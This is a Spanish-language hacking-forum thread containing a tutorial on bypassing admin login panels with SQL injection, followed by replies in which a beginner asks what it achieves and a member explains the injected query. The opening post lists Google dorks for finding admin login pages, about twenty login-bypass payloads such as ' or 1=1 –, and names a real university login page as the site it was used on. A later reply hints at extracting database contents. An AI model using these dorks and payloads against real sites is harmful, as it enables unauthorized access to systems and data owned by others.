Bueno como dice hoy are un tutorial sobre el bypass admin panel (SQL) ,es decir, bypasear panel (admin)
algunos dorks
Dorks :
inurl:adminlogin.aspx
inurl:admin/index.php
inurl:administrator.php
inurl:administrator.asp
inurl:login.asp
lo aremos con una simple consulta SQL
,,,
Acá una imagen (mía)
(http://i.imgur.com/hMDo9hp.jpg)
algunos tipos de consultas :
' or 1=1 –
1'or'1'='1
admin'–
" or 0=0 –
or 0=0 –
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1–
" or 1=1–
or 1=1–
' or a=a–
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 –
hi' or 1=1 –
Sitio que use de ejemplo : http://cpr.molsci.ucla.edu/cpr/cpr/login.asp
Bueno Un saludo Undercode ;)
Te hago una pregunta porque recien me estoy iniciando en este tema. Hacer esto en el adminlogin, de que sirve? Se que ahi estas tirando un true-false (en tu caso un 1 o "todas las verdaderas"). Pero que se obtiene de resultado? para que sirve? Que es lo que se puede conseguir?
Se entiende mi pregunta?
Saludos
wow revivir un post de hace 24 meses
salu2
hermano date una vuelta en el buscador del foro de como funcionan las consultas de SQL que es una inyeccion SQL primero antes de ejecutar "ataques con dorks" ::)
@nuk3rb0mb (https://underc0de.org/foro/index.php?action=profile;u=49353) blood_rec tiene razón, la próxima vez que tengas una duda la puedes postear en el foro "Dudas y pedidos generales".
Y sobre tu duda, esta inyección SQL es por post en el form de logeo y básicamente lo que hace es dar por correcta la sentencia ingresada como clave, ya que uno es igual a uno quedando la consulta asi:
SELECT * FROM users
WHERE name='admin'
and password='' or '1'='1'
y dando el OK te da acceso al panel, esta técnica se conoce como Login Bypass y es muy vieja.
P/D: También se podría prepara una sentencia mejor, inyectarla y hacer que nos devuelva algunos datos de la DB más interesantes que un simple bypass.
Saludos!